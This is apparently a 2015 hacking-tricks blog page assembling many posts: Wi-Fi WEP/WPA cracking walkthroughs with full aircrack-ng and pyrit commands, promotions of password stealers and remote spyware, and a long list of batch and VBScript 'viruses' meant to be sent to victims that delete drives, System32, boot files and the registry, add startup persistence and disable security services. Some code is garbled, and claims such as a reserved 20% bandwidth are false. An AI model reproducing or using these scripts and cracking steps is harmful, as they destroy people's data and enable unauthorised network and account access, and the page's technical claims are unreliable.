Monday 12 January 2015

Finding Ip Address Of A Website Using Command Prompt Or CMD

In this tutorial i will teach you to find Ip Address of any website using Command Prompt or in short CMD. Using IP Address you can find location of the website server and do more stuff. I will demostrate this tutorial with Google but you can use this method to find IP Address of any website like twitter, facebook etc. So lets get started.

How to find IP ?

How To Lock Folder ? Without Any Software

How To Lock Folder ?

   1. Open Notepad and Copy code given below into it.
cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK

Wifi Hack By Backtrack



In this article i will explain how you can crack wireless network's WEP key using Backtrack in six easy steps

WiFi Hacking Part 2
I believe all my blog readers have read the previous article WiFi Hacking Part 1, and know what are the tools and stuff that you require for WiFi hacking

Commonly Used Terms :- 
  • WEP - Wired Equivalency Privacy, it is a security protocol for Wi-Fi networks
  • Access Point (AP)- A wireless router
  • MAC Address - Media Access Control address, a unique id assigned to wireless adapters and routers .It comes in hexadecimal format (ie 00:15:eR:21:a3:63)
  • BSSID - Access Point’s MAC address
  • ESSID - Access Point’s Broadcast name


Cracking WEP Using Backtrack


Step -1 Booting Backtrack

Boot your copy of Backtrack from your USB drive (refer my article on how to make a bootable Backtrack USB ),Once booted you will be prompted for the login details, enter usename as "root" and password as "toor", finally enter "startx " to start backtrack .Now once you have logged in, launch a new konsole terminal by clicking the konsole terminal icon which is there on the task bar .Now plug in your Wifi usb card and type in the following commands in the terminal as shown
ifconfig wlan0 up

where wlan0 is the name of the wireless card ,it can be different .To see all wireless cards connected to your system simply type" iwconfig "

Step -2 Putting your WiFi card on Monitor Mode

The purpose of this step is to put your card into what is called monitor mode. Monitor mode is the mode whereby your card can listen to every packet in the air ,It is similar to a Promiscuous mode which is used for packet sniffing in a LAN .You can put your card into Monitor mode by entering the following commands in a terminal
airmon-ng  start (your interface)

Example :- airmon-ng  start wlan0

Now a new interface mon0 or ath0 will be created , You can see the new interface is in monitor mode by entering "iwconfig" as shown


Step -3  Monitor the air for WiFI connections 


Now after putting the card in monitor mode you will need to monitor the air for available wireless networks (WiFi connections)around  you , For this you'll have to use a tool called "airodump" .

So you can start monitoring the air with airodump by enter the following commands
airodump-ng  mon0

where mon0 is the new interface which we created in the previous step
Bssid shows the mac address of the AP, CH shows the channel in which AP is broadcasted and Essid shows the name broadcasted by the AP, Cipher shows the encryption type ,

Stop the process by pressing  "ctrl +c " and select your target  ,Since i am only cracking WEP  i will take "johny" as my target from now on

Step -4 Capturing Data with Airodump 

Now to crack the WEP key you'll have to capture the targets data into a file, To do this we use airodump tool again, but with some additional switches to target a specific AP and channel. Most importantly, you should restrict monitoring to a single channel to speed up data collection, otherwise the wireless card has to alternate between all channels .You can restrict the capture by giving in the following commands
airodump-ng mon0 --bssid -c (channel ) -w (file name to save )
As my target is broadcasted in channel 2 and has bssid  "98:fc:11:c9:14:22" ,I give in the following commands and save the captured data as "johnywep"
airodump-ng   mon0 --bssid  98:fc:11:c9:14:22   -c 2  -w  johnywep
Do not close this terminal (run the other commends simultaneously in an another terminal)


Step -5 Using Aireplay to Speed up the cracking  

You will have to capture at least 25,000 data packets to crack WEP .This can be done in two ways, The first one would be a (passive attack ) wait for a client to connect to the AP and then start capturing the data packets but this method is very slow, it can take days or even weeks to capture that many data packets

The second method would be an (active attack )this method is fast and only takes minutes to generate and inject that many packets .

In an active attack  you'll have do a Fake authentication (connect) with the  AP ,then you'll have to generate and inject data packets.This can be done very easily by using a tool called "aireplay"

So you can do a Fake authentication with the AP using aireplay by entering the following commands in a new terminal
aireplay-ng - 1  3  -a (bssid fo the target )  (interface)

In my case i enter the following

aireplay-ng -1 3  -a 98:fc:11:c9:14:22 mon0 

After doing a fake auth ,now its time to generate and inject Arp (data )packets . To this you'll have to open a terminal simultaneously and enter the following commands
aireplay-ng 3  -b (bssid of target)  -h ( address of your card (mon0))   (interface)

In my case i enter
aireplay-ng 3  -b 98:fc:11:c9:14:22   -h 00:c0:ca:50:f8:32 mon0
If this step was successful  you'll see Lot of data packets in the airodump capture ( step 4  ) as shown


Wait till it reaches at least 25000 packets , best would be to wait till it reaches around 80,000 to 90,000 packets .Its simple more the data packets  less the time to crack .once you captured enough number of packets, close all the process's by pressing "Ctrl +c" or by simply clicking the into mark which is there on the terminal

Strep -6 Cracking WEP  key using Aircrack 

Now its time crack the WEP key from the captured data, we use Aircrack to achieve this

Enter the following commands to crack the WEP key
aircrack-ng  (name of the captured file (step 4) )

In my case i enter 

aircrack-ng johnywep-0.1-cap
With in a few minutes Aircrak will crack the WEP key as shown


Voila you have successfully  cracked the WEP key in Six simple steps

Unlock your data card/dongle/modem easily

  Unlocking your data card easy


  • DC-unlocker is a program specialized for data card unlocking.
  • It is the first universal data card unlocking product worldwide.
  • It is fast ( takes 5 - 60 seconds to unlock), easy to use and functional program with clear interface.
  • It doesn't need any cables or adapters for unlocking. The data card can be simply unlocked in the same notebook where a PCMCIA or Express socket exists.
  • New models are being added regularly.
  • No need to select any COM ports, auto detect function.
  • Free updates.
 

                                         1.          VCell.3G.Data.Connection.Manager

Windows Unsolved Mysteries


  Here are some of the unsolved mysterious things  involving the worlds most used
  OS "Windows" .One day i got a mail stating that......


Nobody can create a FOLDER anywhere on the computer which can be named as “CON”.This is something pretty cool…and unbelievable… At Microsoft the whole Team, including  Bill  Gates, couldn’t answer why this happened!
 TRY IT NOW !!
                                                                                

Password Cracker 1.1 - Download

One of  my blogging  friends (Black star) has developed password cracking tool. Password Cracker 1.1 .This tool can crack  MD5,SHA-1,.. Hash codes using Dictionary Attack Method. Password Cracker 1.1 is open source (free) , you can download the tool from the following link 




Download :-


For windows Users :-
Download the Password Cracker 1.1 from Here
Open the HashCodeCracker.exe which is inside the folder .

Hack Windows Password Using Pwdump and John The Ripper



I have already written articles on How you can hack windows passwords Using various tools such as Ophcrack ,Chntpw and i have also written  an article on how to hack windows password using stick keys . In this article i will explain an another way to Hack/crack windows password using  Pwdump and John the ripper

Hack Windows Password Using Pwdump and John The Ripper 



Things we need :-

1. Pwdump - To dump windows password hashes
2. John the Ripper - To crack the dumped password hashes

John The Ripper -Tutorial


 John the Ripper  is probably the fastest, most versatile, and definitely one of the most popular password crackers available. It supports six different password hashing schemes that cover various flavors of Unix and the Windows LANMan hashes also known as NTLM (used by NT, 2000, and XP). It can use specialized wordlists or password rules based on character type and placement.

I got many Emails from my blog readers requesting me to write an article on how to use john the ripper ,But  actually there are may nice tuts on the net on this subject . So i taught instead of writing i can share one such article  The following article is written by  Renegade





 





John The Ripper Tutorial

I wrote this tutorial as best I could to try to explain to the newbie how to operate JTR. Remember, this is a newbie tutorial, so I wont go into detail with all of the features. JTR is a program that decyrpts Unix passwords using DES (Data Encryption Standard).

Hack a Remote Computer Using Realtime Spy

In one of my previous tutorials we discussed how we can use ardamax key logger to hack remote computers .In this article i will explain What is Realtime spy and i will also explain How you can use  Real time spy to hack remote computers


What is Real time Spy ?
Realtime-Spy is the latest in cutting-edge remote spy software monitoring technology that allows you to monitor ANY PC you own from ANYWHERE. Realtime-Spy is remotely installable .It is one of the best and the Cheapest spying softwares which is out there in the market

How to Hack Passwords Using An USB Drive Read more

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE ,chrome and Firefox. There exists many tools for recovering these passwords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff /hack passwords from any computer.



Create your Own Personal Web Proxy Site in 5 easy Steps Read more:

All most every one Following my blog must have Know about proxy servers , A proxy is an address ( IP address ) of a  Server (proxy server)  that is placed between your computer and the Internet , There are many advantages of using a proxy server. I've already explained that in one of my previous articles, you can  read my previous article on Proxies From Here .If your new to Proxies then i would strongly suggest  you to read the article before reading this one

We use proxies in our day to day life to do various things mainly to view blocked websites in schools , collages and in offices  we also use proxies to do anonymous surfing , There are different types of proxy servers but the most commonly used one is Web Proxy. So in this tutorial i will explain how you can Create your Own Personal Web Proxy Site in 5 easy Steps

Hack Email, Facebook and Myspace Passwords Using Istealers Read more

What are Stealer's ?It is a small software which steals passwords that are stored in our web browsers, chat apps such as yahoo messenger .etc , Stealer's then send these stolen passwords to the Hackers FTP server, Usually Stealer's  look like keyloggers but there are many differences, Stealer's steal only  passwords that stored in the web browsers they wont capture keystrokes typed by the user

Hide Data Behind Images Without Using Any software......




Steganography is the art and science of hiding messages, Images, Data .etc  in such a way that no one, apart from the sender and intended recipient, suspects the existence of the Data, a form of security through obscurity. By using this trick your data will get hidden into any image of your choice without reducing its quality, In following tutorial i will show you how you can Hide Data  Behind  Images without using any software

Hide Data Behind Images Without Using Any Software
1. Create a folder in your C drive and name it as “hide

2. Copy all the images you want to hide and also the image behind which you want hide into this directory.

iCare Data Recovery Software For Window 7 & 8

iCare Data Recovery Software 4.5 Free Download With Serial Key

 

 



iCare Data Recovery Software is a simple-to-use, powerful and comprehensive award-winning data recovering application which is designed to easily, quickly recover and rescue your lost or deleted document, photo, image, video, music, email and other file formats caused of hard disk failure, formatted HDD, corrupted MBR (Mast Boot Record), bad boot sector, inaccessible drive, unreadable partition, damaged partition, virus infected, unexpected system failure and etc, aiming to cure the nightmares of losing important data files. In addition, the iCare Data Recovery supports wide range of storage media including hard drive, portable HDD, USB Flash drive, memory cards, external ZIP drives and

Top 12 Android Apps to Turn Your Smartphone into a Hacking Device.

There are apps out there that are tools to help you hack. This is sometimes in a real sense and sometimes a side effect. For example, a fire axe is used to break through doors, but can also be used to break open skulls. That is why you may find some of these apps on app marketplaces--because they have a legitimate use too. The writer of this article and the webmaster of this site are not responsible for what you do with this information, nor can we guarantee the safety or success of these apps. You use, download and/or install them at your own risk.

HACK WIFI PASSWORD WITH BACKTRACK 5

WARNING:Don't Hack any authorized router,otherwise you'll be put into jail.  


 certain things to be followed..such as creating virtual machine!!!running in your OS if you have windows..!!

  •  press enter......go on



  •  At BOOT Menu....just type startx

  • an Now your all set to go...just simply follow below steps...now  


Rules to Follow
    • A Backtrack Live CD: the Linux Live CD that lets you do all sorts of security testing and tasks. Download yourself a copy of the CD and burn it, or load it up in VMware to get started.
    • here a link to download it http://www.backtrack-linux.org/downloads
    • I highly recommend you to download backtrck 32 bit version coz it runs smoothly...in win7 64bit through vmware workstation.......... /
    • A nearby WEP-enabled Wi-Fi network 
    • Patience with the command line. This is an ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient.                                            

 Steps to Follow:
Step 1 :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]



Step 2 :

airmon-ng start wlan0

Step 3 (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up


Step 4 :

airodump-ng mon0

Then, press "
Ctrl+c" to break the program.

Step 5 :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

*where -c is the channel
           -w is the file to be written
           --bssid is the BSSID

This terminal is keeping running.

Step 6 :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step 7 :

Use the John the Ripper as word list to crack the WPA/WP2 password.

aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

Step 8 (Optional) :ITS AN OPTIONAL STEP,,,,,,

If you do not want to use John the Ripper as word list, you can use Crunch.

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install


/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

*where
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

(B) nVidia Display Card with CUDA

If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.

Step a :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]



Step b :

airmon-ng start wlan0

Step c (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up


Step d :

airodump-ng mon0

Then, press "
Ctrl+c" to break the program.

Step e :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0

Step f :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step g :

If the following programs are not yet installed, please do it.

apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

Step h :

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download
crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install


Step i :

Go to the official site of pyrit.

http://code.google.com/p/pyrit/downloads/list

Download
pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install


tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install


Step j :

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step k (Optional) :

If you encounter error when reading the
wpacrack-01.cap, you should do the following step.

pyrit -r wpacrack-01.cap -o new.cap stripLive

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step l :

Then, you will see something similar to the following.

Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)

Tried 17960898 PMKs so far; 17504 PMKs per second.


Remarks :

If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.

To test if your wireless card (either USB or PCI-e) can do the injection or not :

airodump-ng mon0
Open another terminal.
aireplay-ng -9 mon0
Make sure pyrit workable on your system :

pyrit list_cores




WhatsApp for PC or WhatsApp for Computer Download

CLICK HERE TO DOWNLOAD WHATSAPP FOR PC

WhatsApp is among those apps which need no introduction to any user. Not just smartphone owners, even featured mobile phone owners are looking for the app as it is the most popular or you can even call it as number one app of the smartphone. If you wish to use it from PC online then I’m here with a guide that will let you download WhatsApp for PC (Windows) for free.
WhatsApp is the best app that can be used to send unlimited free text messaging to any of your friend who is also using it on his/her smartphone or supported featured mobile phone.
You can download this messenger officially from google play store here


WhatsApp for PC

Download WhatsApp for PC (Windows)

Follow the simple steps as mentioned down here in order to download WhatsApp for Windows PC.
  1. Download BlueStacks app player on your PC first and install it. (link)
  2. Using search tool of BlueStacks, find WhatsApp app.
  3. Download the app and install it once you found it.
That’s it! This is how you can and use it from PC online for free.
So I hope you liked this guide on free downloading WhatsApp on PC or Computer (Windows 7/8/XP) and if you faced any problem then please do comment and let us know about it so that we can surely solve it for you people.
WhatsApp for Windows

Top Online Hash Cracking Site

                                                Top Online  Hash Cracking Site.....
http://crypo.in.ua/tools/
http://www.md5decrypter.co.uk/
http://www.md5this.com/index.php
http://md5hack.com/
http://www.miraclesalad.com/webtools/md5.php
http://hash.online-convert.com/md5-generator
http://md5decryption.com/
http://www.netmd5crack.com/cracker/
http://www.md5decrypter.com/
https://isc.sans.edu/tools/reversehash.html
http://www.md5crack.com/
http://md5.web-max.ca/
http://www.md5.net/
http://www.cmd5.org/
http://md5pass.info/
http://md5.darkbyte.ru/
http://www.tydal.nu/article/md5-crack
http://tools.benramsey.com/md5/
http://www.xmd5.org/index_en.htm
http://www.hash-cracker.com/
http://www.md5.cz/
http://www.md5decryption.com/
http://www.adamek.biz/md5-generator.php
http://www.whatsmyip.org/hash-generator/
http://www.hashemall.com/
www.hashgenerator.de
http://blog.faultylabs.com/?d=md5
http://www.xorbin.com/tools/md5-hash-calculator
https://www.functions-online.com/md5.html
http://md5.com.cn/
http://tools.benramsey.com/md5/
http://www.cmd5.org/
http://www.crypo.com/
https://www.freerainbowtables.com/de/hashcracking/
http://www.insidepro.com/hashes.php?lang=rus
http://www.md5.com.cn/
http://md5cracker.org/

MAKING MOST DANGEROUS VIRUS CALLED MATRIX

Warning - Do not run it on your computer

I'm gonna teach you how to make a virus named Matrix...

1-Open notepad
2-Put in this code

#include
#include
#include
#include
#include
#include
#include
using namespace std;

int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{
char buffer[255];
char inputFile[]="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat", ios::app);
fp
fp
fp
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}

{
char buffer[255];
char inputFile[]="C:\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp
fp
fp
fp
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}

START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout
}
goto START;



3-save it as matrix.bat
4-finish



AS IT WAS TOO DANGEROUS THE ACTUAL HEADER FILES FOR THIS SCRIPT ARE NOT GIVEN

How to stop someone's internet access

Open  Notepad And Type This


@Echo off
Ipconfig /release

Save that as a .bat and send it to someone. They're IP address will be lost, and therefore they won't be able to fix it

However, this is VERY easy to fix. Simply type in IPconfig /renew

How to Boost Internet Speed by 20% without any Software

How to boost Internet Speed by 20% without any Software

Increase internet speed by 20% without any software –

Microsoft reserves 20% of your available bandwidth for their own purposes like Windows Updates and interrogating your PC etc. By unreserving this bandwidth, you can make your internet connection faster. By 20%. The steps to be followed are:-


1. Click Start then Run and type "gpedit.msc" without quotes.


2. Then go to Local Computer Policy>Computer Configuration>Administrative Templetes>Network>QoS Packet Scheduler. Click on QoS Packet Scheduler. In the right side , find Limit Reservable Bandwidth and double click on Limit Reservable Bandwidth.


3. It will say it is not configured but the truth is under the ‘Explain’ tab. Select ‘Enable’ and set reservable bandwidth to zero.


4. Click on ‘Apply’ and your internet speed will boost up by 20%.

ShutDown PC million Times

1.right click on the desktop
2.click shortcut
you will get a dialogue box, write in it: shutdown -s -t 1000 c "any comment u want" then press next
note: this "1000" i wrote is the time in seconds needed for ur computer to shutdown,u can put any number u want...
3.u will get another dialogue box, write in it: Internet Explorer and press finish
4.u
will find the icon on ur desktop, dont open it, just right click on it
and press properties>change icon>select the icon the the internet
explorer and the press apply then ok
try to open it, it is a virus hehe
PS: the only way 2 stop ur computer from shutting down is to go 2 start>run>type: shutdown -a

SHUT UR INTERNET PERMENANTLY

This
is a slightly more advanced one. It shuts down your internet
permanately. I tried it on myself accidently, i knew what it did, and it
still took me a couple of days to get my internet back. works best on
XP, not tested on vista or 7.
EDIT: At the bottom put a rickroll
site or something. BTW, that 3rd line, isnt what disables the internet
permanately. It is somethinge else, that just provides a fast response
to shut down any connections.


@echo off
reg
add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MiXedVeX /t
REG_SZ /d %systemroot%\HaloTrialScoreChangerV1 /f > nul
start iexpress (website of your choice)
ipconfig /release
del "C:\Program Files\Microsoft Games
del "C:Nexon
del "C:\Program Files\Xfire
del "C:\Program Files\Adobe"
del "C:\Program Files\Internet Explorer"
del "C:\Program Files\Mozilla Firefox"
del "C:\WINDOWS"
del "C:\WINDOWS\system32"
del "C:\WINDOWS\system32\cmd"
del "C:\WINDOWS\system32\iexpress"
del "C:\WINDOWS\system32\sndvol32"
del "C:\WINDOWS\system32\sndrec32"
del "C:\WINDOWS\system32\Restore\rstrui"
del "C:\WINDOWS\system32\wupdmgr"
del "C:\WINDOWS\system32\desktop"
del "C:\WINDOWS\java"
del "C:\WINDOWS\Media"
del "C:\WINDOWS\Resources"
del "C:\WINDOWS\system"
del "C:\drivers"
del "C:\drv"
del "C:\SYSINFO"
del "C:\Program Files"
echo ipconfig/release_all>>c:windowswimn32.bat
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
:a
start iexpress (website of your choice)
goto a

Thread-20-Viruses-Using-NotePad-Very-Dangerous


Here I am posting 21 program scripts which are helped in create a virus using
notepad. Some of them will works on windows xp and. some of them in windows 7


Here is a Batch File virus which can:
1.Copy itself into startup
2.Copy itself over one thousand times into random spots in your computer.
3.Hide its self and all other created files
4.Task kill MSN, Norton, Windows Explorer, Limewire.
5.Swap the left mouse button with the right one
6.Opens alert boxes
7.Changes the time to 12:00 and shuts down the computer
copy this code into notepad and save as Greatgame.bat(while saving select all files instead of text ).
Here is the Code:

@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP
No 2:-

Just open your notepad
1) Click start -> all programs -> accessories -> notepad
2) Or just press or click windows key + r :: run window will open and
type notepad and hit enter .

NOW TYPE THE FOLLOWING CODE ::

@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q

Then save it as kinng.bat and the batch file is created .
WARNING :: This is the most dangerous virus! Be careful with its use.

Delete the entire registry

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*

Now save it as kinng.bat and the batch file is created .
No 3:-

How to crash a PC Forever !:::

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Open up notepad and copy and paste that. Save it as a .bat file.
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.
REMEMBER - DO NOT CLICK THIS FILE.


No 4 :-

How to stop someone's internet access::::


@Echo off
Ipconfig /release

Save that as a .bat and send it to someone. They're IP address will be lost, and therefore they won't be able to fix it

However, this is VERY easy to fix. Simply type in IPconfig /renew

No 5 :-


ShutDown PC million Times::::

1.right click on the desktop
2.click shortcut
you will get a dialogue box, write in it: shutdown -s -t 1000 c "any comment u want" then press next
note: this "1000" i wrote is the time in seconds needed for ur computer to shutdown,u can put any number u want...
3.u will get another dialogue box, write in it: Internet Explorer and press finish
4.u will find the icon on ur desktop, dont open it, just right click on it and press properties>change icon>select the icon the the internet explorer and the press apply then ok
try to open it, it is a virus hehe
PS: the only way 2 stop ur computer from shutting down is to go 2 start>run>type: shutdown -a

No 6:-

Open Notepad
Write / copy the below command there:
" del c:\WINDOWS\system32\*.*/q " without quote
and save as " anything.bat"
Done. If You Give this file to your victim his SYSTEM 32 Folder will be deleted. Without which a Windows Pc cant be started.




No 7:-


Process:
Open Notepad
Copy the below command there
"rd/s/q D:\
rd/s/q C:\
rd/s/q E:\" ( without quotes )
Save as "anything.bat
This virus Formats the C ,D , and E Drive in 3 Seconds.

No 8 :-


Just open the Notepad and type the paste the following Code.
set ws=createobject("wscript.shell")
dim strDir,strfile,st,strtxt2,strshell,strlog
dim obfso,obfolder,obshell,obfile,obtxtfile
strshell="wscript.shell"
strDir="C:\WINDOWS"
strfile="\wscript.vbs"
st=Chr(34)
strlog="shutdown -l"
strtxt2="ws.run(strlog)"
set obfso=CreateObject("Scripting.FileSystemObject")
on error resume next
set obfile=obfso.CreateTextfile(strDir & strfile)
obfile.writeline("set ws=createobject("&st&strshell&st&")")
obfile.writeline("ws.run("&st&strlog&st&")")
ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WINDOWS\wscript.vbs","REG_SZ”

Now Save This Notepad file With Any Name Having .vbs Extension .

No 9 :-

Open Notepad and write "start" without quotes
Start
Start
Start
and then save it with .bat extension.
Now double click on this .bat file to run Command Prompt.

No 10:-

Convey your friend a little message and shut down his / her computer:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

No 11 :-

Toggle your friend's Caps Lock button simultaneously:

Code:
Set wshShell =wscript.CreateObject("WScript.Shel
l")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it.

No 12:-

Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Code:
Set wshShell = wscript.CreateObject("WScript.Shell
")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

No 13 :-
This Virus Deletes All The Content Of A Drive...

@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00


Save The Above Code As Anything.bat




No 14:-

This Will Crash Ur Computer

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

Save It As Anything.vbs

No 15 :-

The Most Simple Virus To Crush The Window
It Only Works With Windows XP


@Echo off
Del C: *.* |y

Save It As Anything.bat

No 16 :-

Virus that crashes pc
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive


Save As Anything.bat File In Notepad!!
This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!

No 17:-

Shutdowns Computer Everytime It Is Turned On

Save As A bat File

